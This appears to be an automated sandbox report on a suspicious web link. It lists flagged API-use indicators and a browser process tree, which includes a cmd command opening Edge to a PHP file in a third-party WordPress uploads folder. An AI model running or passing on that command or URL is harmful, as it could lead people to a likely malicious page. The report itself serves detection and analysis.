Token: SeDebugPrivilege	3040	powershell.exe
Token: SeSecurityPrivilege	3892	7zFM.exe
Token: SeDebugPrivilege	2284	powershell.exe
Token: SeDebugPrivilege	3024	powershell.exe
Token: SeDebugPrivilege	3520	firefox.exe
Token: SeDebugPrivilege	3520	firefox.exe
Token: SeDebugPrivilege	3520	firefox.exe
Token: SeDebugPrivilege	3520	firefox.exe
Token: SeDebugPrivilege	3520	firefox.exe
Token: SeDebugPrivilege	3520	firefox.exe
Token: SeDebugPrivilege	3520	firefox.exe
Token: SeDebugPrivilege	3520	firefox.exe
Token: SeDebugPrivilege	3520	firefox.exe
Token: SeDebugPrivilege	3520	firefox.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

firefox.exechrome.exechrome.exe

pid	process
3520	firefox.exe
3520	firefox.exe
3520	firefox.exe
3520	firefox.exe
3520	firefox.exe
3520	firefox.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
3520	firefox.exe
3520	firefox.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

firefox.exechrome.exechrome.exe

pid	process
3520	firefox.exe
3520	firefox.exe
3520	firefox.exe
3520	firefox.exe
3520	firefox.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
3520	firefox.exe
3520	firefox.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe

Suspicious use of SetWindowsHookEx 11 IoCs

Processes:

MicrosoftEdge.exefirefox.exeMicrosoftEdgeCP.exe

pid	process
2244	MicrosoftEdge.exe
3520	firefox.exe
4556	MicrosoftEdgeCP.exe
2244	MicrosoftEdge.exe
2244	MicrosoftEdge.exe
3520	firefox.exe
3520	firefox.exe
3520	firefox.exe
3520	firefox.exe
3520	firefox.exe
3520	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

firefox.exefirefox.exe

description	pid	process	target process
PID 3056 wrote to memory of 3520	3056	firefox.exe	firefox.exe
PID 3056 wrote to memory of 3520	3056	firefox.exe	firefox.exe
PID 3056 wrote to memory of 3520	3056	firefox.exe	firefox.exe
PID 3056 wrote to memory of 3520	3056	firefox.exe	firefox.exe
PID 3056 wrote to memory of 3520	3056	firefox.exe	firefox.exe
PID 3056 wrote to memory of 3520	3056	firefox.exe	firefox.exe
PID 3056 wrote to memory of 3520	3056	firefox.exe	firefox.exe
PID 3056 wrote to memory of 3520	3056	firefox.exe	firefox.exe
PID 3056 wrote to memory of 3520	3056	firefox.exe	firefox.exe
PID 3520 wrote to memory of 2356	3520	firefox.exe	firefox.exe
PID 3520 wrote to memory of 2356	3520	firefox.exe	firefox.exe
PID 3520 wrote to memory of 3888	3520	firefox.exe	firefox.exe
PID 3520 wrote to memory of 3888	3520	firefox.exe	firefox.exe
PID 3520 wrote to memory of 3888	3520	firefox.exe	firefox.exe
PID 3520 wrote to memory of 3888	3520	firefox.exe	firefox.exe
PID 3520 wrote to memory of 3888	3520	firefox.exe	firefox.exe
PID 3520 wrote to memory of 3888	3520	firefox.exe	firefox.exe
PID 3520 wrote to memory of 3888	3520	firefox.exe	firefox.exe
PID 3520 wrote to memory of 3888	3520	firefox.exe	firefox.exe
PID 3520 wrote to memory of 3888	3520	firefox.exe	firefox.exe
PID 3520 wrote to memory of 3888	3520	firefox.exe	firefox.exe
PID 3520 wrote to memory of 3888	3520	firefox.exe	firefox.exe
PID 3520 wrote to memory of 3888	3520	firefox.exe	firefox.exe
PID 3520 wrote to memory of 3888	3520	firefox.exe	firefox.exe
PID 3520 wrote to memory of 3888	3520	firefox.exe	firefox.exe
PID 3520 wrote to memory of 3888	3520	firefox.exe	firefox.exe
PID 3520 wrote to memory of 3888	3520	firefox.exe	firefox.exe
PID 3520 wrote to memory of 3888	3520	firefox.exe	firefox.exe
PID 3520 wrote to memory of 3888	3520	firefox.exe	firefox.exe
PID 3520 wrote to memory of 3888	3520	firefox.exe	firefox.exe
PID 3520 wrote to memory of 3888	3520	firefox.exe	firefox.exe
PID 3520 wrote to memory of 3888	3520	firefox.exe	firefox.exe
PID 3520 wrote to memory of 3888	3520	firefox.exe	firefox.exe
PID 3520 wrote to memory of 3888	3520	firefox.exe	firefox.exe
PID 3520 wrote to memory of 3888	3520	firefox.exe	firefox.exe
PID 3520 wrote to memory of 3888	3520	firefox.exe	firefox.exe
PID 3520 wrote to memory of 3888	3520	firefox.exe	firefox.exe
PID 3520 wrote to memory of 3888	3520	firefox.exe	firefox.exe
PID 3520 wrote to memory of 3888	3520	firefox.exe	firefox.exe
PID 3520 wrote to memory of 3888	3520	firefox.exe	firefox.exe
PID 3520 wrote to memory of 3888	3520	firefox.exe	firefox.exe
PID 3520 wrote to memory of 3888	3520	firefox.exe	firefox.exe
PID 3520 wrote to memory of 3888	3520	firefox.exe	firefox.exe
PID 3520 wrote to memory of 3888	3520	firefox.exe	firefox.exe
PID 3520 wrote to memory of 3888	3520	firefox.exe	firefox.exe
PID 3520 wrote to memory of 3888	3520	firefox.exe	firefox.exe
PID 3520 wrote to memory of 3888	3520	firefox.exe	firefox.exe
PID 3520 wrote to memory of 3888	3520	firefox.exe	firefox.exe
PID 3520 wrote to memory of 3888	3520	firefox.exe	firefox.exe
PID 3520 wrote to memory of 3888	3520	firefox.exe	firefox.exe
PID 3520 wrote to memory of 3888	3520	firefox.exe	firefox.exe
PID 3520 wrote to memory of 3888	3520	firefox.exe	firefox.exe
PID 3520 wrote to memory of 3888	3520	firefox.exe	firefox.exe
PID 3520 wrote to memory of 3888	3520	firefox.exe	firefox.exe
PID 3520 wrote to memory of 4268	3520	firefox.exe	firefox.exe
PID 3520 wrote to memory of 4268	3520	firefox.exe	firefox.exe
PID 3520 wrote to memory of 4268	3520	firefox.exe	firefox.exe
PID 3520 wrote to memory of 4268	3520	firefox.exe	firefox.exe
PID 3520 wrote to memory of 4268	3520	firefox.exe	firefox.exe
PID 3520 wrote to memory of 4268	3520	firefox.exe	firefox.exe
PID 3520 wrote to memory of 4268	3520	firefox.exe	firefox.exe
PID 3520 wrote to memory of 4268	3520	firefox.exe	firefox.exe
PID 3520 wrote to memory of 4268	3520	firefox.exe	firefox.exe
PID 3520 wrote to memory of 4268	3520	firefox.exe	firefox.exe

C:\Windows\system32\cmd.exe
cmd /c start microsoft-edge:https://www.fencingindia.co.in/HOLD-blog/wp-content/uploads/2021/11/cafeteria.php
1⤵
- Checks computer location settings
PID:3224

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3056

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
2⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3520

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3520.0.1691431247\1960958904" -parentBuildID 20200403170909 -prefsHandle 1556 -prefMapHandle 1548 -prefsLen 1 -prefMapSize 219987 -appdir "C:\Program Files\Mozilla Firefox\browser" - 3520 "\\.\pipe\gecko-crash-server-pipe.3520" 1612 gpu
3⤵
PID:2356

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3520.3.1736127721\1348041770" -childID 1 -isForBrowser -prefsHandle 2216 -prefMapHandle 2212 -prefsLen 156 -prefMapSize 219987 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 3520 "\\.\pipe\gecko-crash-server-pipe.3520" 2228 tab
3⤵
PID:3888

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3520.13.1152846744\601073215" -childID 2 -isForBrowser -prefsHandle 3368 -prefMapHandle 3364 -prefsLen 6938 -prefMapSize 219987 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 3520 "\\.\pipe\gecko-crash-server-pipe.3520" 3388 tab
3⤵
PID:4268

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2244

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:3152

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:1180

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:3336

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4556

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:5100

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4412

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd0,0xd4,0xd8,0xac,0xdc,0x7ff828004f50,0x7ff828004f60,0x7ff828004f70
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3752

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1524,1814869272368219810,4695819150572653402,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1540 /prefetch:2
2⤵
PID:212

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1524,1814869272368219810,4695819150572653402,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1756 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2288

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1524,1814869272368219810,4695819150572653402,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2296 /prefetch:8
2⤵
PID:4820

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1524,1814869272368219810,4695819150572653402,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2640 /prefetch:1
2⤵
PID:2372

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1524,1814869272368219810,4695819150572653402,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2624 /prefetch:1
2⤵
PID:940

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1524,1814869272368219810,4695819150572653402,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3540 /prefetch:1
2⤵
PID:4856

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1524,1814869272368219810,4695819150572653402,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4176 /prefetch:8
2⤵
PID:4772

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1524,1814869272368219810,4695819150572653402,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4160 /prefetch:8
2⤵
PID:4144

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1524,1814869272368219810,4695819150572653402,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4248 /prefetch:8
2⤵
PID:5096

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4556

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff828004f50,0x7ff828004f60,0x7ff828004f70
2⤵
PID:4392

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1436,13041377230093119906,6286685746300001138,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1512 /prefetch:2
2⤵
PID:1292

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1436,13041377230093119906,6286685746300001138,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2104 /prefetch:8
2⤵
PID:3944

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1436,13041377230093119906,6286685746300001138,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1940 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3940

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1436,13041377230093119906,6286685746300001138,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2532 /prefetch:1
2⤵
PID:2232

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1436,13041377230093119906,6286685746300001138,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2512 /prefetch:1
2⤵
PID:2448

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1436,13041377230093119906,6286685746300001138,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:1
2⤵
PID:5064

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1436,13041377230093119906,6286685746300001138,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3688 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1532

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1436,13041377230093119906,6286685746300001138,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4424 /prefetch:8
2⤵
PID:4728

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1436,13041377230093119906,6286685746300001138,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4616 /prefetch:8
2⤵
PID:4740

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1436,13041377230093119906,6286685746300001138,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4876 /prefetch:8
2⤵
PID:3864

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1436,13041377230093119906,6286685746300001138,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4448 /prefetch:1
2⤵
PID:5100

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1436,13041377230093119906,6286685746300001138,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4796 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1272

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1436,13041377230093119906,6286685746300001138,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3052 /prefetch:8
2⤵
PID:4576

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1436,13041377230093119906,6286685746300001138,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4468 /prefetch:8
2⤵
PID:4176

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1436,13041377230093119906,6286685746300001138,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3132 /prefetch:8
2⤵
PID:4680

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1436,13041377230093119906,6286685746300001138,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3956 /prefetch:8
2⤵
PID:4952

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1436,13041377230093119906,6286685746300001138,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3944 /prefetch:1
2⤵
PID:4848

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1436,13041377230093119906,6286685746300001138,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3528 /prefetch:1
2⤵
PID:3920

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1436,13041377230093119906,6286685746300001138,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5708 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:5108

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1436,13041377230093119906,6286685746300001138,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2672 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4104

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1436,13041377230093119906,6286685746300001138,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6116 /prefetch:1
2⤵
PID:4216

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1436,13041377230093119906,6286685746300001138,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4576 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2232

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1436,13041377230093119906,6286685746300001138,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5676 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3908

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1436,13041377230093119906,6286685746300001138,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3556 /prefetch:8
2⤵
PID:2116

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1436,13041377230093119906,6286685746300001138,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3540 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4368

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1436,13041377230093119906,6286685746300001138,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5108 /prefetch:1
2⤵
PID:5064

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1436,13041377230093119906,6286685746300001138,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1568 /prefetch:1
2⤵
PID:4744

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1436,13041377230093119906,6286685746300001138,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3708 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2196

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1436,13041377230093119906,6286685746300001138,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6040 /prefetch:8
2⤵
PID:1272

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1436,13041377230093119906,6286685746300001138,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3796 /prefetch:8
2⤵
PID:4544

C:\Program Files\Google\Chrome\Application\chrome.exe
